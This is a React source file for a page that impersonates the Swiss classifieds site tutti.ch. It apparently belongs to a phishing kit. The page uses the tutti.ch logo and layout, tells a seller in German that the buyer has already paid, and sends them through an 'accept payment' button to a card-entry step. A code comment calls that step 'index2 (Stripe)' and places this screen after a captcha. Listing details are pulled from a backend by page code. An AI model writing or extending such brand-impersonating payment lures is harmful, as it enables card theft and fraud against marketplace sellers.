import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './TuttiChSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const TUTTI_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/tutti-logo.png`;

function formatDeDate(d) {
  const x = d instanceof Date ? d : new Date();
  const dd = String(x.getDate()).padStart(2, '0');
  const mm = String(x.getMonth() + 1).padStart(2, '0');
  const yyyy = x.getFullYear();
  return `${dd}.${mm}.${yyyy}`;
}

function TruckIcon() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M20 8h-3V4H3c-1.1 0-2 .9-2 2v11h2c0 1.66 1.34 3 3 3s3-1.34 3-3h6c0 1.66 1.34 3 3 3s3-1.34 3-3h2v-5l-3-4zM6 18.5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5zm13.5-9l1.96 2.5H17V9.5h2.5zm-1.5 9c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z" />
    </svg>
  );
}

/** Dünnes Schild mit Häkchen — wie auf tutti.ch Zahlungsbox */
function ShieldCheckThin({ className }) {
  return (
    <svg
      className={className}
      width="28"
      height="28"
      viewBox="0 0 24 24"
      fill="none"
      stroke="currentColor"
      strokeWidth="1.15"
      strokeLinejoin="round"
      aria-hidden
    >
      <path d="M12 2.2L4.2 5.05v5.85c0 4.35 2.95 8.4 7.8 9.4 4.85-1 7.8-5.05 7.8-9.4V5.05L12 2.2z" />
      <path d="M8.2 12.2l2.2 2.2 5.4-5.4" strokeLinecap="round" />
    </svg>
  );
}

function CardIconWhite({ className }) {
  return (
    <svg className={className} width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M20 4H4c-1.11 0-1.99.89-1.99 2L2 18c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V6c0-1.11-.89-2-2-2zm0 14H4v-6h16v6zm0-10H4V6h16v2z" />
    </svg>
  );
}

function SocialFacebook() {
  return (
    <svg viewBox="0 0 24 24" width="20" height="20" aria-hidden>
      <circle cx="12" cy="12" r="12" fill="#1877f2" />
      <path
        fill="#fff"
        d="M13.3 8.3h1.7V6c-.3 0-1.2-.1-2.3-.1-2.3 0-3.9 1.4-3.9 4v2.3H7v2.8h2.8V20h3.4v-6.9h2.8l.5-2.8h-3.3v-1.9c0-.8.2-1.3 1.3-1.3h1.8V8.3z"
      />
    </svg>
  );
}

function SocialInstagram() {
  return (
    <svg viewBox="0 0 24 24" width="20" height="20" aria-hidden>
      <defs>
        <linearGradient id="tuttiChIgGrad" x1="0%" y1="100%" x2="100%" y2="0%">
          <stop offset="0%" stopColor="#f09433" />
          <stop offset="50%" stopColor="#e6683c" />
          <stop offset="100%" stopColor="#bc1888" />
        </linearGradient>
      </defs>
      <circle cx="12" cy="12" r="12" fill="url(#tuttiChIgGrad)" />
      <path
        fill="#fff"
        d="M12 8.2a3.8 3.8 0 1 0 0 7.6 3.8 3.8 0 0 0 0-7.6zm0 6.2a2.4 2.4 0 1 1 0-4.8 2.4 2.4 0 0 1 0 4.8zm4.8-6.4a.9.9 0 1 1-1.8 0 .9.9 0 0 1 1.8 0z"
      />
    </svg>
  );
}

function SocialTwitter() {
  return (
    <svg viewBox="0 0 24 24" width="20" height="20" aria-hidden>
      <circle cx="12" cy="12" r="12" fill="#1da1f2" />
      <path
        fill="#fff"
        d="M18.2 8.1c-.5.2-1 .4-1.6.5.6-.4 1-1 1.2-1.7-.6.4-1.2.6-1.9.7a2.8 2.8 0 0 0-4.8 1.9v.6a8 8 0 0 1-6.4-3.2c-.3.6-.5 1.2-.5 2a2.9 2.9 0 0 0 1.2 2.4 2.7 2.7 0 0 1-1.3-.4v.1a2.8 2.8 0 0 0 2.3 2.8c-.5.1-1 .2-1.5 0 .4 1.3 1.7 2.3 3.2 2.3a5.6 5.6 0 0 1-4.2 1.2 7.9 7.9 0 0 0 4.3 1.3c5.1 0 7.9-4.2 7.9-7.9v-.4c.5-.4 1-1 1.4-1.6z"
      />
    </svg>
  );
}

function SocialYoutube() {
  return (
    <svg viewBox="0 0 24 24" width="20" height="20" aria-hidden>
      <circle cx="12" cy="12" r="12" fill="#ff0000" />
      <path fill="#fff" d="M10 8.5v7l6-3.5-6-3.5z" />
    </svg>
  );
}

function SocialRss() {
  return (
    <svg viewBox="0 0 24 24" width="20" height="20" aria-hidden>
      <circle cx="12" cy="12" r="12" fill="#ff6600" />
      <circle cx="7" cy="16" r="2" fill="#fff" />
      <path fill="none" stroke="#fff" strokeWidth="1.8" d="M6 10a8 8 0 0 1 8 8M6 14a4 4 0 0 1 4 4" strokeLinecap="round" />
    </svg>
  );
}

/**
 * tutti.ch (CH) — экран «Zahlung akzeptieren» после капчи; далее index2 (Stripe).
 */
function TuttiChSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'CH').toUpperCase();

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const recipientFull = [fn, ln].filter(Boolean).join(' ') || '—';
  const nachname = ln || '';
  const empfangsName = fn || recipientFull;
  const address = (pageData?.delivery_address || '').trim() || '—';
  const locationLine = address.split(',')[0]?.trim() || 'Schweiz';
  const productTitle = (pageData?.product_name || '').trim() || '—';
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="tutti-wrap">
        <header className="tutti-header">
          <div className="tutti-header-inner">
            <span className="tutti-logo tutti-logo--img">
              <img src={TUTTI_LOGO_SRC} alt="tutti.ch" className="tutti-logo-img" width={125} height={36} />
            </span>
          </div>
        </header>
        <div className="tutti-loading">Wird geladen…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="tutti-wrap">
      <header className="tutti-header">
        <div className="tutti-header-inner">
          <a href="#/" className="tutti-logo tutti-logo--img" aria-label="tutti.ch">
            <img src={TUTTI_LOGO_SRC} alt="tutti.ch" className="tutti-logo-img" width={125} height={36} />
          </a>
          <div className="tutti-search-wrap">
            <div className="tutti-search">
              <input type="search" placeholder="Was suchst du?" readOnly aria-label="Suche" />
              <button type="button" className="tutti-search-btn" aria-label="Suchen">
                <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor">
                  <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z" />
                </svg>
              </button>
            </div>
          </div>
          <nav className="tutti-nav-top">
            <a href="#/">Nachrichten</a>
            <a href="#/" className="tutti-nav-plus">
              + Inserat aufgeben
            </a>
            <span className="tutti-dropdown">Mein tutti.ch ▾</span>
          </nav>
        </div>
      </header>

      <main className="tutti-main">
        <div className="tutti-grid">
          <article className="tutti-card-left">
            <div className="tutti-photo">
              {photoUrl ? (
                <img src={photoUrl} alt="" />
              ) : (
                <span className="tutti-photo-placeholder" aria-hidden>
                  ◆
                </span>
              )}
            </div>
            <div className="tutti-card-body">
              <h1 className="tutti-title">{productTitle}</h1>
              <p className="tutti-price">
                {priceText} CHF
              </p>
              <div className="tutti-meta">
                <div className="tutti-meta-row">
                  <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                    <path d="M12 2C8.13 2 5 5.13 5 9c0 5.25 7 13 7 13s7-7.75 7-13c0-3.87-3.13-7-7-7zm0 9.5c-1.38 0-2.5-1.12-2.5-2.5s1.12-2.5 2.5-2.5 2.5 1.12 2.5 2.5-1.12 2.5-2.5 2.5z" />
                  </svg>
                  <span>{locationLine}</span>
                </div>
                <div className="tutti-meta-row">
                  <svg width="18" height="18" viewBox="0 0 24 24" fill="currentColor">
                    <path d="M19 3h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19c0 1.1.89 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11zM7 10h5v5H7z" />
                  </svg>
                  <span>{formatDeDate(new Date())}</span>
                </div>
              </div>
            </div>
          </article>

          <div className="tutti-right">
            <div className="tutti-alert">
              <div className="tutti-alert-icon" aria-hidden>
                <TruckIcon />
              </div>
              <p>
                Ihr Produkt ist bereits bezahlt! Sie können das Geld entgegennehmen. Der Käufer hat die Ware und die
                Lieferkosten bezahlt.
              </p>
            </div>

            <div className="tutti-form-card">
              <h2 className="tutti-form-title">Daten des Empfängers</h2>
              <div className="tutti-field">
                <label htmlFor="tutti-nachname">Nachname des Empfängers</label>
                <input id="tutti-nachname" readOnly value={nachname} />
              </div>
              <div className="tutti-field">
                <label htmlFor="tutti-name">Empfängername</label>
                <input id="tutti-name" readOnly value={empfangsName} />
              </div>
              <div className="tutti-field">
                <label htmlFor="tutti-addr">Adresse des Empfängers</label>
                <input id="tutti-addr" readOnly value={address} />
              </div>
            </div>

            <div className="tutti-payment-panel">
              <div className="tutti-payment-panel-inner">
                <div className="tutti-payment-panel-left">
                  <div className="tutti-payment-panel-head">
                    <ShieldCheckThin className="tutti-payment-shield" />
                    <h2 className="tutti-payment-heading">Sicherstellung von Zahlungen</h2>
                  </div>
                  <p className="tutti-payment-legal">
                    Indem Sie auf die Schaltfläche &apos;Zahlung akzeptieren&apos; klicken, akzeptieren Sie einen Vertrag
                    über den Verkauf von Waren über den Online-Dienst &apos;Sicherer Vertrag&apos;.
                  </p>
                </div>
                <div className="tutti-payment-panel-right">
                  <Link to={index2Path} className="tutti-accept-btn">
                    <CardIconWhite className="tutti-accept-card-ico" />
                    <span className="tutti-accept-btn-lines">
                      <span>Zahlung</span>
                      <span>akzeptieren</span>
                    </span>
                  </Link>
                </div>
              </div>
            </div>

            <div className="tutti-payment-notes">
              <p>
                Nehmen Sie das Geld auf Ihrer Debitkarte entgegen und senden Sie die Ware an die vom Käufer angegebene
                Adresse.
              </p>
              <p>
                Wenn das Produkt versendet wird, geben Sie dem Käufer bitte die Liefernummer an, das Produkt muss innerhalb
                von 7 Tagen nach Erhalt des Geldes versendet werden.
              </p>
            </div>
          </div>
        </div>
      </main>

      <footer className="tutti-footer">
        <div className="tutti-footer-grid">
          <div className="tutti-footer-col-links">
            <div className="tutti-footer-links">
              <a href="#/">AGB</a>
              <a href="#/">Hilfe</a>
              <a href="#/">Werbung</a>
              <a href="#/">Jobs</a>
              <a href="#/">Kontakt</a>
              <a href="#/">Medien</a>
              <a href="#/">Privatsphäre-Einstellungen</a>
              <a href="#/">Datenschutz</a>
            </div>
            <div className="tutti-footer-row2">
              <a href="#/">ImmoPRO</a>
              <a href="#/">AutoPRO</a>
              <a href="#/">tuttiPRO</a>
            </div>
          </div>
          <div className="tutti-footer-col-social">
            <div className="tutti-social">
              <a href="#/" className="tutti-social-btn" aria-label="Facebook">
                <SocialFacebook />
              </a>
              <a href="#/" className="tutti-social-btn" aria-label="Instagram">
                <SocialInstagram />
              </a>
              <a href="#/" className="tutti-social-btn" aria-label="Twitter">
                <SocialTwitter />
              </a>
              <a href="#/" className="tutti-social-btn" aria-label="YouTube">
                <SocialYoutube />
              </a>
              <a href="#/" className="tutti-social-btn" aria-label="RSS">
                <SocialRss />
              </a>
            </div>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default TuttiChSuccess;
